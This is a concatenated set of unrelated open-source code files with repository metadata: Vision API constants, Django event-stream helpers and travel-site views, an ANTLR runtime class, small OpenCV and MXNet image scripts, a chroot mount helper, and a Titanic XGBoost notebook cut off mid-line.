| false
| 1,000
|
py
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Likelihood constants returned from Vision API."""
class Likelihood(object):
"""A representation of likelihood to give stable results across upgrades.
See:
https://cloud.google.com/vision/reference/rest/v1/images/annotate#likelihood
"""
UNKNOWN = 'UNKNOWN'
VERY_UNLIKELY = 'VERY_UNLIKELY'
UNLIKELY = 'UNLIKELY'
POSSIBLE = 'POSSIBLE'
LIKELY = 'LIKELY'
VERY_LIKELY = 'VERY_LIKELY'
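# Usage sketch (editor's addition; ``safe`` is a hypothetical
# SafeSearchAnnotation-style result carrying these constants):
#
#     if safe.adult in (Likelihood.LIKELY, Likelihood.VERY_LIKELY):
#         reject_image()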
|
[
"kirsanov.bvt@gmail.com"
] |
kirsanov.bvt@gmail.com
|
4dd509a2a70827664579c9c6793d408263d2abd3
|
2c5101623d0e12e66afac57a5599e9b45c0e65f9
|
/groupchat/venv/lib/python3.5/site-packages/django_eventstream/utils.py
|
ba6393f92d586c4bd344bd993ef41d2e8409420c
|
[] |
no_license
|
shushantkumar/chatapp-django-channels
|
bc40aa600a6a59c379d6f5b987ddfae71abb5dad
|
6ec71d87134615769025ec9cc18da9d614d1d499
|
refs/heads/master
| 2020-03-17T23:10:36.280696
| 2018-05-24T05:08:06
| 2018-05-24T05:08:06
| 134,034,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,775
|
py
|
import json
import threading
import importlib
import six
from werkzeug.http import parse_options_header
from django.conf import settings
from django.http import HttpResponse
from django.core.serializers.json import DjangoJSONEncoder
from gripcontrol import HttpStreamFormat
from django_grip import publish
try:
from urllib import quote
except ImportError:
from urllib.parse import quote
tlocal = threading.local()
# return dict of (channel, last-id)
def parse_grip_last(s):
parsed = parse_options_header(s, multiple=True)
out = {}
for n in range(0, len(parsed), 2):
channel = parsed[n]
params = parsed[n + 1]
last_id = params.get('last-id')
if last_id is None:
raise ValueError('channel "%s" has no last-id param' % channel)
out[channel] = last_id
return out
# return dict of (channel, last-id)
def parse_last_event_id(s):
out = {}
parts = s.split(',')
for part in parts:
channel, last_id = part.split(':')
out[channel] = last_id
return out
def make_id(ids):
id_parts = []
for channel, id in six.iteritems(ids):
enc_channel = quote(channel)
id_parts.append('%s:%s' % (enc_channel, id))
return ','.join(id_parts)
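# Example (editor's addition): make_id({'room': '42'}) returns 'room:42',
# and parse_last_event_id('room:42') recovers {'room': '42'} -- the two
# functions are inverses for channel names that quote() leaves unchanged.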
def build_id_escape(s):
out = ''
for c in s:
if c == '%':
out += '%%'
else:
out += c
return out
def sse_encode_event(event_type, data, event_id=None, escape=False):
data_str = json.dumps(data, cls=DjangoJSONEncoder)
if escape:
event_type = build_id_escape(event_type)
data_str = build_id_escape(data_str)
out = 'event: %s\n' % event_type
if event_id:
out += 'id: %s\n' % event_id
out += 'data: %s\n\n' % data_str
return out
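# Example (editor's addition): sse_encode_event('message', {'text': 'hi'}, event_id='3')
# yields "event: message\nid: 3\ndata: {\"text\": \"hi\"}\n\n",
# ready to write to a text/event-stream response.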
def sse_error_response(condition, text, extra={}):
data = {'condition': condition, 'text': text}
for k, v in six.iteritems(extra):
data[k] = v
body = sse_encode_event('stream-error', data, event_id='error')
return HttpResponse(body, content_type='text/event-stream')
def publish_event(channel, event_type, data, pub_id, pub_prev_id,
skip_user_ids=[]):
content_filters = []
if pub_id:
event_id = '%I'
content_filters.append('build-id')
else:
event_id = None
content = sse_encode_event(event_type, data, event_id=event_id, escape=bool(pub_id))
meta = {}
if skip_user_ids:
meta['skip_users'] = ','.join(skip_user_ids)
publish(
'events-%s' % quote(channel),
HttpStreamFormat(content, content_filters=content_filters),
id=pub_id,
prev_id=pub_prev_id,
meta=meta)
def publish_kick(user_id, channel):
msg = 'Permission denied to channels: %s' % channel
data = {'condition': 'forbidden', 'text': msg, 'channels': [channel]}
content = sse_encode_event('stream-error', data, event_id='error')
meta = {'require_sub': 'events-%s' % channel}
publish(
'user-%s' % user_id,
HttpStreamFormat(content),
id='kick-1',
meta=meta)
publish(
'user-%s' % user_id,
HttpStreamFormat(close=True),
id='kick-2',
prev_id='kick-1',
meta=meta)
def load_class(name):
at = name.rfind('.')
if at == -1:
raise ValueError('class name contains no \'.\'')
module_name = name[0:at]
class_name = name[at + 1:]
return getattr(importlib.import_module(module_name), class_name)()
# load and keep in thread local storage
def get_class(name):
if not hasattr(tlocal, 'loaded'):
tlocal.loaded = {}
c = tlocal.loaded.get(name)
if c is None:
c = load_class(name)
tlocal.loaded[name] = c
return c
def get_class_from_setting(setting_name, default=None):
if hasattr(settings, setting_name):
return get_class(getattr(settings, setting_name))
elif default:
return get_class(default)
else:
return None
def get_storage():
return get_class_from_setting('EVENTSTREAM_STORAGE_CLASS')
def get_channelmanager():
return get_class_from_setting(
'EVENTSTREAM_CHANNELMANAGER_CLASS',
'django_eventstream.channelmanager.DefaultChannelManager')
|
[
"shushantkmr2@gmail.com"
] |
shushantkmr2@gmail.com
|
bb92a4fbe5cfa6ba62e826caf72954a732bb9e22
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/otherforms/_emasculates.py
|
a1b9e9f4cad8bf9f0e90f0b93fdf68dd57c412e6
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
# class header
class _EMASCULATES():
def __init__(self,):
self.name = "EMASCULATES"
        self.definitions = ['emasculate']  # quoted: the bare name would raise NameError; mirrors self.basic below
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['emasculate']
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
af77c1523d4d9b222680e0262c87780f066ae5fe
|
cabdd862b94cb37924c9b73bdab3a7a6f72f3506
|
/bin/annex-passport
|
369183ab4d99e6308eb46bf51615549b2ce55766
|
[
"Unlicense"
] |
permissive
|
umeboshi2/dotfiles
|
313114284e300f552a5e77b1ef8c9bb34833caae
|
8aa56f93bd4efc1beaa56762d286450a453a9e58
|
refs/heads/master
| 2023-01-14T03:51:51.055141
| 2021-02-17T23:40:37
| 2021-02-17T23:40:37
| 18,471,913
| 0
| 2
|
Unlicense
| 2022-12-26T21:34:27
| 2014-04-05T17:18:31
|
Emacs Lisp
|
UTF-8
|
Python
| false
| false
| 1,421
|
#!/usr/bin/env python
import os, sys
import subprocess
import argparse
# a simple script to mount and unmount removable passport
# drive in annex chroot.
passport_mediapath = 'media/umeboshi/passport'
annex_chroot = '/var/lib/schroot/mount/annex'
main_mntpt = os.path.join('/', passport_mediapath)
annex_passport = os.path.join(annex_chroot, passport_mediapath)
def is_passport_mounted():
return annex_passport in file('/proc/mounts').read()
def mount_passport():
if is_passport_mounted():
raise RuntimeError, "Passport already mounted"
cmd = ['sudo', 'mount', '--bind', main_mntpt, annex_passport]
subprocess.check_call(cmd)
def umount_passport():
if not is_passport_mounted():
raise RuntimeError, "Passport not mounted"
cmd = ['sudo', 'umount', annex_passport]
subprocess.check_call(cmd)
if is_passport_mounted():
raise RuntimeError, "Passport still mounted"
parser = argparse.ArgumentParser()
parser.add_argument('command', default=None, nargs="?")
args = parser.parse_args()
ACTIONFUN = dict(mount=mount_passport, umount=umount_passport)
command = args.command
if command is None:
if is_passport_mounted():
command = 'umount'
else:
command = 'mount'
if command not in ACTIONFUN:
raise RuntimeError, "Unknown command: %s" % command
#print "command", command
ACTIONFUN[command]()
print "Annex %sed." % command
|
[
"joseph.rawson.works@littledebian.org"
] |
joseph.rawson.works@littledebian.org
|
|
efff35648033dc2420b00bdc78193848dab512cb
|
fb5a99b06d2525c46ff24b97cff37ea0a14cc0ca
|
/opencv/convert_to_grayscale.py
|
ec6e28a4a805bdda7a25e24d23ae9c7066a73d97
|
[] |
no_license
|
khx0/image-processing
|
efac3d1e39a2ce67701a534633ce8f9af2ba35fe
|
9d173b6b298d511583237011b0ffbcd01f3a1fda
|
refs/heads/master
| 2020-03-23T09:48:34.657459
| 2018-08-29T11:15:08
| 2018-08-29T11:15:08
| 141,408,649
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,456
|
py
|
##########################################################################################
# author: Nikolas Schnellbaecher
# contact: nikolas.schnellbaecher@bioquant.uni-heidelberg.de
# date: 2018-08-28
# file: convert_to_grayscale.py
# requires: OpenCV
# https://opencv.org
# Tested with Python 3.7.0 and OpenCV version 3.4.2
##########################################################################################
import sys
import time
import datetime
import os
import math
import numpy as np
import matplotlib.pyplot as plt
# import OpenCV python bindings
import cv2
def ensure_dir(dir):
if not os.path.exists(dir):
os.makedirs(dir)
now = datetime.datetime.now()
now = "%s-%s-%s" %(now.year, str(now.month).zfill(2), str(now.day).zfill(2))
BASEDIR = os.path.dirname(os.path.abspath(__file__))
RAWDIR = os.path.join(BASEDIR, 'raw')
OUTDIR = os.path.join(BASEDIR, 'out')
ensure_dir(RAWDIR)
if __name__ == '__main__':
filename = 'test_image.png'
img = cv2.imread(os.path.join(RAWDIR, filename))
print("RGB image shape =", img.shape)
# convert RGB 3 channel image to grayscale
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
print("Grayscale image shape =", img_gray.shape)
# plot grayscale image using matplotlib's imshow command
fig, ax = plt.subplots()
ax.imshow(img_gray,
interpolation = 'nearest',
cmap = plt.cm.gray)
plt.show()
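    # A small extension sketch (not in the original script): persist the
    # grayscale result to OUTDIR, which is defined above but otherwise unused.
    ensure_dir(OUTDIR)
    out_file = os.path.join(OUTDIR, 'test_image_gray.png')
    cv2.imwrite(out_file, img_gray)
    print("wrote", out_file)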
|
[
"khx0@posteo.net"
] |
khx0@posteo.net
|
c886e1c66c831d014b2619c235b6c78fbff842fb
|
0874ecce812388593a34014cad26d3b4959d07ac
|
/awards/views.py
|
bc491a3653604b8ff42c8c15273d84fadf3688b1
|
[
"MIT"
] |
permissive
|
melissa-koi/awwardsclone
|
d990f82eb9d1354a54af68d7fa61fe5856bfd2c1
|
b82447cea82672038ea9fa9d9ca9867bff3c35f0
|
refs/heads/main
| 2023-06-01T12:20:05.315928
| 2021-06-03T15:31:21
| 2021-06-03T15:31:21
| 372,236,218
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,212
|
py
|
from django.db.models import Avg, F, Sum
from django.shortcuts import render, redirect
from .forms import RegisterForm, RateForm, UploadWeb, CreateProfileForm, UserUpdateForm, ProfileUpdateForm
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import Website, Rate,Profile
from django.contrib.auth.models import User
# Create your views here.
@login_required(login_url='/login/')
def home(request):
title = "Home Page"
cards = Website.get_all()
return render(request, 'index.html' ,{"title": title, "cards": cards})
@login_required(login_url='/login/')
def site(request, pk):
title= "site"
photo = Website.objects.get(id=pk)
site = Website.objects.get(id=pk)
rates = Rate.objects.filter(website=site)
user = request.user
if request.method == 'POST':
form = RateForm(request.POST)
if form.is_valid():
rate = form.save(commit=False)
rate.user = user
rate.website = site
rate.save()
else:
form = RateForm()
return render(request, 'site.html', {"title": title, "photo": photo, "form":form, "rates":rates})
@login_required(login_url='/login/')
def post_website(request):
current_user = request.user
print(current_user)
if request.method == "POST":
form = UploadWeb(request.POST, request.FILES)
if form.is_valid():
img = form.save(commit=False)
img.author =current_user
img.save()
return redirect('home')
else:
form = UploadWeb()
return render(request, 'post_website.html', {"form":form})
@login_required(login_url='/login/')
def profile(request,username):
title="profile"
site = Website.get_user(username)
profile = Profile.get_user(username)
print(request.user)
return render(request, 'profile.html', {"title": title, "cards":site, "profiles":profile})
@login_required(login_url='/login/')
def update_profile(request,profile_id):
user=User.objects.get(pk=profile_id)
if request.method == "POST":
u_form = UserUpdateForm(request.POST,instance=request.user)
p_form = ProfileUpdateForm(request.POST,request.FILES,instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request,f"You Have Successfully Updated Your Profile!")
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
return render(request,'update_profile.html',{"u_form":u_form, "p_form":p_form})
@login_required(login_url='/login/')
def search_results(request):
if 'projects' in request.GET and request.GET["projects"]:
search_term = request.GET.get("projects")
searched_project = Website.get_projects(search_term)
message = f'{search_term}'
return render(request, 'search.html',{"message":message,"cards": searched_project})
else:
message = "You haven't searched for any term"
return render(request, 'search.html',{"message":message})
def registerUser(request):
form = RegisterForm()
if request.method == 'POST':
form = RegisterForm(request.POST)
if form.is_valid():
form.save()
return redirect('login')
else:
form = RegisterForm()
return render(request, 'accounts/register.html', {'form':form})
def loginUser(request):
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
if username and password:
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('home')
else:
messages.error(request, 'Username or Password is Incorrect')
else:
messages.error(request, 'Fill out all the fields')
return render(request, 'accounts/login.html', {})
def logoutUser(request):
logout(request)
return redirect('home')
|
[
"melissawangui3@gmail.com"
] |
melissawangui3@gmail.com
|
8824696e2db2d6a34fb6fc5a99c2eac887d2018b
|
20e9106fd6398691dcfe95c18d75bf1e09d28369
|
/runtime/Python2/src/antlr4/ParserRuleContext.py
|
f0eb4995f6079786342c04a78b4764390c69a617
|
[
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
alvarogarcia7/antlr4
|
4eb30d1e79adc31fe1901129acc2b4f91a1c0657
|
82372aae2ce73abe5e087a159a517a0890224fb7
|
refs/heads/master
| 2021-01-04T02:41:55.596897
| 2016-12-10T00:05:11
| 2016-12-10T00:05:11
| 76,113,547
| 0
| 0
| null | 2016-12-10T13:15:45
| 2016-12-10T13:15:45
| null |
UTF-8
|
Python
| false
| false
| 5,715
|
py
|
# Copyright (c) 2012-2016 The ANTLR Project. All rights reserved.
# Use of this file is governed by the BSD 3-clause license that
# can be found in the LICENSE.txt file in the project root.
#* A rule invocation record for parsing.
#
# Contains all of the information about the current rule not stored in the
# RuleContext. It handles parse tree children list, Any ATN state
# tracing, and the default values available for rule invocations:
# start, stop, rule index, current alt number, current
# ATN state.
#
# Subclasses made for each rule and grammar track the parameters,
# return values, locals, and labels specific to that rule. These
# are the objects that are returned from rules.
#
# Note text is not an actual field of a rule return value; it is computed
# from start and stop using the input stream's toString() method. I
# could add a ctor to this so that we can pass in and store the input
# stream, but I'm not sure we want to do that. It would seem to be undefined
# to get the .text property anyway if the rule matches tokens from multiple
# input streams.
#
# I do not use getters for fields of objects that are used simply to
# group values such as this aggregate. The getters/setters are there to
# satisfy the superclass interface.
from antlr4.RuleContext import RuleContext
from antlr4.tree.Tree import TerminalNodeImpl, ErrorNodeImpl, TerminalNode, INVALID_INTERVAL
class ParserRuleContext(RuleContext):
def __init__(self, parent = None, invokingStateNumber = None ):
super(ParserRuleContext, self).__init__(parent, invokingStateNumber)
#* If we are debugging or building a parse tree for a visitor,
# we need to track all of the tokens and rule invocations associated
# with this rule's context. This is empty for parsing w/o tree constr.
# operation because we don't need to track the details about
# how we parse this rule.
#/
self.children = None
self.start = None
self.stop = None
# The exception that forced this rule to return. If the rule successfully
# completed, this is {@code null}.
self.exception = None
#* COPY a ctx (I'm deliberately not using copy constructor)#/
def copyFrom(self, ctx):
# from RuleContext
self.parentCtx = ctx.parentCtx
self.invokingState = ctx.invokingState
self.children = None
self.start = ctx.start
self.stop = ctx.stop
# Double dispatch methods for listeners
def enterRule(self, listener):
pass
def exitRule(self, listener):
pass
#* Does not set parent link; other add methods do that#/
def addChild(self, child):
if self.children is None:
self.children = []
self.children.append(child)
return child
#* Used by enterOuterAlt to toss out a RuleContext previously added as
# we entered a rule. If we have # label, we will need to remove
# generic ruleContext object.
#/
def removeLastChild(self):
if self.children is not None:
del self.children[len(self.children)-1]
def addTokenNode(self, token):
node = TerminalNodeImpl(token)
self.addChild(node)
node.parentCtx = self
return node
def addErrorNode(self, badToken):
node = ErrorNodeImpl(badToken)
self.addChild(node)
node.parentCtx = self
return node
def getChild(self, i, ttype = None):
if ttype is None:
return self.children[i] if len(self.children)>i else None
else:
for child in self.getChildren():
if not isinstance(child, ttype):
continue
if i==0:
return child
i -= 1
return None
def getChildren(self, predicate = None):
if self.children is not None:
for child in self.children:
if predicate is not None and not predicate(child):
continue
yield child
def getToken(self, ttype, i):
for child in self.getChildren():
if not isinstance(child, TerminalNode):
continue
if child.symbol.type != ttype:
continue
if i==0:
return child
i -= 1
return None
def getTokens(self, ttype ):
if self.getChildren() is None:
return []
tokens = []
for child in self.getChildren():
if not isinstance(child, TerminalNode):
continue
if child.symbol.type != ttype:
continue
tokens.append(child)
return tokens
def getTypedRuleContext(self, ctxType, i):
return self.getChild(i, ctxType)
def getTypedRuleContexts(self, ctxType):
children = self.getChildren()
if children is None:
return []
contexts = []
for child in children:
if not isinstance(child, ctxType):
continue
contexts.append(child)
return contexts
def getChildCount(self):
return len(self.children) if self.children else 0
def getSourceInterval(self):
if self.start is None or self.stop is None:
return INVALID_INTERVAL
else:
return (self.start.tokenIndex, self.stop.tokenIndex)
RuleContext.EMPTY = ParserRuleContext()
class InterpreterRuleContext(ParserRuleContext):
def __init__(self, parent, invokingStateNumber, ruleIndex):
super(InterpreterRuleContext, self).__init__(parent, invokingStateNumber)
self.ruleIndex = ruleIndex
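# A minimal usage sketch (not part of the runtime): _FakeToken is a stand-in
# for a real antlr4 Token, providing only the attributes the methods above use.
if __name__ == '__main__':
    class _FakeToken(object):
        def __init__(self, ttype, index):
            self.type = ttype
            self.tokenIndex = index

    ctx = ParserRuleContext()
    ctx.addTokenNode(_FakeToken(1, 0))
    ctx.addTokenNode(_FakeToken(2, 1))
    print(ctx.getChildCount())             # 2
    print(ctx.getToken(1, 0) is not None)  # True: first terminal of type 1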
|
[
"parrt@cs.usfca.edu"
] |
parrt@cs.usfca.edu
|
2115b468d4bc223050b6dcdf147277fe1a3ae7cf
|
7252d86a55e5e388d9e7c81c3390679116a41958
|
/pages/mipagina/urls.py
|
b79f832ad575b90c9fbfbd83f5b10ee435653d0b
|
[] |
no_license
|
IvanPuentes/Proyecto_U4_Regula
|
f979f2a15fbd6dd722a707dd5bf412e5cbfaee70
|
811edd72ceea450f6392d5d228e67406bf1c0371
|
refs/heads/master
| 2023-06-04T04:42:18.334554
| 2021-06-22T00:51:43
| 2021-06-22T00:51:43
| 379,051,861
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,147
|
py
|
from django.urls import path,include
from .views import HomePageView,TecView,RegistrarView,CreateViajesView,CreateVuelosView,VueloPageView,CreateHospedajeView,HospedajePageView,UpdatePageView,UpdateVueloPageView,UpdateHospedajePageView,DescripViajesPageView,DescripVuelosPageView,DescripHospPageView,ViajeDeleteView,AboutPageView,ComentarioCreateView,SearchResultListview,VueloDeleteView,HospDeleteView,ComentarioViajeCreateView,ComentarioHospCreateView
from django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, PasswordResetCompleteView
#importar las librerias y los archivos
#rutas para los templates
urlpatterns=[
path('',HomePageView.as_view(),name='home'),
path('Vuelos',VueloPageView.as_view(),name='vuelo'),
path('Hospedaje',HospedajePageView.as_view(),name='hospedaje'),
path('orders/', include('orders.urls')),
path('Acerca_de',AboutPageView.as_view(), name='About'),
path('registrar/', RegistrarView.as_view(),name='registrar'),
path('Nuevo/Viaje',CreateViajesView.as_view(),name='CreateViaje'),
path('Nuevo/Vuelo',CreateVuelosView.as_view(),name='CreateVuelo'),
path('Nuevo/Hospedaje',CreateHospedajeView.as_view(),name='CreateHospedaje'),
path('Viajes/<int:pk>/Update',UpdatePageView.as_view(),name='EditarViaje'),
path('Vuelo/<int:pk>/Update',UpdateVueloPageView.as_view(),name='EditarVuelo'),
path('Hospedaje/<int:pk>/Update',UpdateHospedajePageView.as_view(),name='EditarHospedaje'),
path('Descripcion/Viajes/<int:pk>',DescripViajesPageView.as_view(),name='DescViajes'),
path('Descripcion/Vuelos/<int:pk>',DescripVuelosPageView.as_view(),name='DescVuelos'),
path('Descripcion/Hospedaje/<int:pk>',DescripHospPageView.as_view(),name='DescHosp'),
path('Viaje/<int:pk>/delete',ViajeDeleteView.as_view(),name='deleteViaje'),
path('Vuelo/<int:pk>/delete',VueloDeleteView.as_view(),name='deleteVuelo'),
path('Hospedaje/<int:pk>/delete',HospDeleteView.as_view(),name='deleteHosp'),
path('Tec',TecView .as_view(),name='tec'),
path('Comentarios/<int:VueloComent>',ComentarioCreateView.as_view(),name='comentarioNuevo'),
path('ComentariosViaje/<int:ViajeComent>',ComentarioViajeCreateView.as_view(),name='comentarioNuevoV'),
path('ComentariosHosp/<int:HospComent>',ComentarioHospCreateView.as_view(),name='comentarioH'),
path('search', SearchResultListview.as_view(), name='search_result'),
#rutas para los cambios y reset de contraseñas
path('password_reset/', PasswordResetView.as_view(
template_name='registration/password_reset.html'
),name='password_reset'),
path('password_reset_done/', PasswordResetDoneView.as_view(
template_name='password_reset_done.html'
),name='password_reset_done'),
    path('usuarios/password_reset_confirm/<uidb64>/<token>', PasswordResetConfirmView.as_view(
template_name='password_reset_confirm.html'
),name='password_reset_confirm'),
path('usuarios/password_reset_complete', PasswordResetCompleteView.as_view(
template_name='password_reset_complete.html'
),name='password_reset_complete'),
]
|
[
"ivan_andi@hotmail.com"
] |
ivan_andi@hotmail.com
|
845d79dde7ac418ae4ca8388a71edea4e4bcbc80
|
6fcfb638fa725b6d21083ec54e3609fc1b287d9e
|
/python/zhaw_neural_style/neural_style-master/texturenet/make_image.py
|
1b842a5854b20a9d13e4427dda47c367a03a74e6
|
[] |
no_license
|
LiuFang816/SALSTM_py_data
|
6db258e51858aeff14af38898fef715b46980ac1
|
d494b3041069d377d6a7a9c296a14334f2fa5acc
|
refs/heads/master
| 2022-12-25T06:39:52.222097
| 2019-12-12T08:49:07
| 2019-12-12T08:49:07
| 227,546,525
| 10
| 7
| null | 2022-12-19T02:53:01
| 2019-12-12T07:29:39
|
Python
|
UTF-8
|
Python
| false
| false
| 3,007
|
py
|
import os
import time
import mxnet as mx
import numpy as np
import symbol
import cPickle as pickle
from skimage import io, transform
def crop_img(im, size):
im = io.imread(im)
if im.shape[0]*size[1] > im.shape[1]*size[0]:
c = (im.shape[0]-1.*im.shape[1]/size[1]*size[0]) / 2
c = int(c)
im = im[c:-(1+c),:,:]
else:
c = (im.shape[1]-1.*im.shape[0]/size[0]*size[1]) / 2
c = int(c)
im = im[:,c:-(1+c),:]
im = transform.resize(im, size)
im *= 255
return im
def preprocess_img(im, size):
if type(size) == int:
size = (size, size)
im = crop_img(im, size)
im = im.astype(np.float32)
im = np.swapaxes(im, 0, 2)
im = np.swapaxes(im, 1, 2)
im[0,:] -= 123.68
im[1,:] -= 116.779
im[2,:] -= 103.939
im = np.expand_dims(im, 0)
return im
def postprocess_img(im):
im = im[0]
im[0,:] += 123.68
im[1,:] += 116.779
im[2,:] += 103.939
im = np.swapaxes(im, 0, 2)
im = np.swapaxes(im, 0, 1)
im[im<0] = 0
im[im>255] = 255
return im.astype(np.uint8)
class Maker():
def __init__(self, model_prefix, output_shape, task):
self.task = task
s1, s0 = output_shape
s0 = s0//32*32
s1 = s1//32*32
self.s0 = s0
self.s1 = s1
if task == 'texture':
self.m = 5
generator = symbol.generator_symbol(self.m, task)
args = mx.nd.load('%s_args.nd'%model_prefix)
for i in range(self.m):
args['z_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
else:
self.m = 5
generator = symbol.generator_symbol(self.m, task)
args = mx.nd.load('%s_args.nd'%model_prefix)
for i in range(self.m):
args['znoise_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
args['zim_%d'%i] = mx.nd.zeros([1,3,s0/16*2**i,s1/16*2**i], mx.gpu())
self.gene_executor = generator.bind(ctx=mx.gpu(), args=args, aux_states=mx.nd.load('%s_auxs.nd'%model_prefix))
def generate(self, save_path, content_path=''):
if self.task == 'texture':
for i in range(self.m):
self.gene_executor.arg_dict['z_%d'%i][:] = mx.random.uniform(-128,128,[1,3,self.s0/16*2**i,self.s1/16*2**i])
self.gene_executor.forward(is_train=True)
out = self.gene_executor.outputs[0].asnumpy()
im = postprocess_img(out)
io.imsave(save_path, im)
else:
for i in range(self.m):
self.gene_executor.arg_dict['znoise_%d'%i][:] = mx.random.uniform(-10,10,[1,3,self.s0/16*2**i,self.s1/16*2**i])
self.gene_executor.arg_dict['zim_%d'%i][:] = preprocess_img(content_path, (self.s0/16*2**i,self.s1/16*2**i))
self.gene_executor.forward(is_train=True)
out = self.gene_executor.outputs[0].asnumpy()
im = postprocess_img(out)
io.imsave(save_path, im)
|
[
"659338505@qq.com"
] |
659338505@qq.com
|
ce4f7f8a6237434ae7a29315408556d8fbc515a1
|
4db61d3e2b36d11aff43be060f8bab6fef3a6c63
|
/flask/index.py
|
2b6e8fb05982a31b2f54f967d6233860b58f71f7
|
[] |
no_license
|
ramalho/microfinder
|
1d59daa3cbb741d80f759ab3a4dd8c189aeed80b
|
0be75d9ff0003e570668db5bcd51e6e5e72821c4
|
refs/heads/master
| 2020-03-24T18:17:37.355736
| 2018-10-10T15:02:22
| 2018-10-10T15:02:22
| 142,888,420
| 0
| 0
| null | 2018-07-30T14:39:53
| 2018-07-30T14:39:52
| null |
UTF-8
|
Python
| false
| false
| 781
|
py
|
import sys, unicodedata
import flask
def add_entry(index, char, name):
for word in name.split():
index.setdefault(word, []).append(char)
def index():
entries = {}
for code in range(sys.maxunicode):
char = chr(code)
try:
name = unicodedata.name(char)
except ValueError:
continue
add_entry(entries, char, name)
return entries
word_index = index()
app = flask.Flask(__name__)
@app.route("/")
def root():
return "This is the microfinder index API server"
@app.route("/<query_str>")
def query(query_str):
try:
res = word_index[query_str.upper()]
except KeyError:
flask.abort(404)
else:
return flask.jsonify(res)
if __name__ == "__main__":
app.run()
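# A quick usage sketch (Flask's built-in test client, so no server process is
# needed; the query word is illustrative):
#
#   with app.test_client() as client:
#       resp = client.get('/SNOWMAN')
#       print(resp.get_json())  # characters whose Unicode name contains SNOWMAN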
|
[
"luciano@ramalho.org"
] |
luciano@ramalho.org
|
b118cd2999cf826b059834c59cf36cb1395e6d13
|
a560269290749e10466b1a29584f06a2b8385a47
|
/Notebooks/py/element/titanic-simple-xgboost-model/titanic-simple-xgboost-model.py
|
c62cce354181f28a6563da15d0f966cfde7f6e46
|
[] |
no_license
|
nischalshrestha/automatic_wat_discovery
|
c71befad1aa358ae876d5494a67b0f4aa1266f23
|
982e700d8e4698a501afffd6c3a2f35346c34f95
|
refs/heads/master
| 2022-04-07T12:40:24.376871
| 2020-03-15T22:27:39
| 2020-03-15T22:27:39
| 208,379,586
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,757
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Basic modeling
# This notebook presents a simple and quick way to implement an XGBoost classifier on the Titanic dataset. It doesn't cover data visualization or feature engineering; it is intended as a first-pass approach.
# In[ ]:
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.metrics import accuracy_score
from sklearn import model_selection
from sklearn import preprocessing
from xgboost import XGBClassifier
import matplotlib.pylab as pylab
import matplotlib.pyplot as plt
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import GridSearchCV
from sklearn.ensemble import BaggingClassifier
def extractDeck(x):
if str(x) != "nan":
return str(x)[0]
else :
return
#Import data
train = pd.read_csv('../input/train.csv')
test = pd.read_csv('../input/test.csv')
combine = train.drop(["Survived"], axis=1).append(test).drop(["PassengerId", "Ticket"], axis=1)
target = train['Survived']
#Feature preprocessing
combine["hasParents"] = combine["Parch"].apply(lambda x : (x>0)*1)
combine["hasSibs"] = combine["SibSp"].apply(lambda x : (x>0)*1)
combine["title"] = combine['Name'].str.extract(' ([A-Za-z]+)\.', expand=False)
combine["Deck"] = combine['Cabin'].apply(extractDeck)
combine.drop(["Parch", "SibSp", "Cabin", "Name"], axis=1)
#Turning categorical to integer
combine['Sex'] = combine['Sex'].map( {'female': 1, 'male': 0} ).astype(int)
#One hot encoding on Embarked
combine['Embarked'].fillna('S', inplace = True)
#combine = pd.get_dummies(combine)#, columns = ['Embarked'])
#Fill the blank
combine['Age'].fillna(combine['Age'].dropna().median(), inplace = True)
#Turning age to ranges
combine.loc[(combine['Age'] <= 16), 'Age'] = 0
combine.loc[(combine['Age'] > 16) & (combine['Age'] <= 32), 'Age'] = 1
combine.loc[(combine['Age'] > 32) & (combine['Age'] <= 48), 'Age'] = 2
combine.loc[(combine['Age'] > 48) & (combine['Age'] <= 64), 'Age'] = 3
combine.loc[(combine['Age'] > 64), 'Age'] = 4  # the assignment was missing here
#Filling the blank
combine['Fare'].fillna(combine['Fare'].dropna().median(), inplace=True)
#Turning fare to ranges
combine.loc[ combine['Fare'] <= 7.91, 'Fare'] = 0
combine.loc[(combine['Fare'] > 7.91) & (combine['Fare'] <= 14.454), 'Fare'] = 1
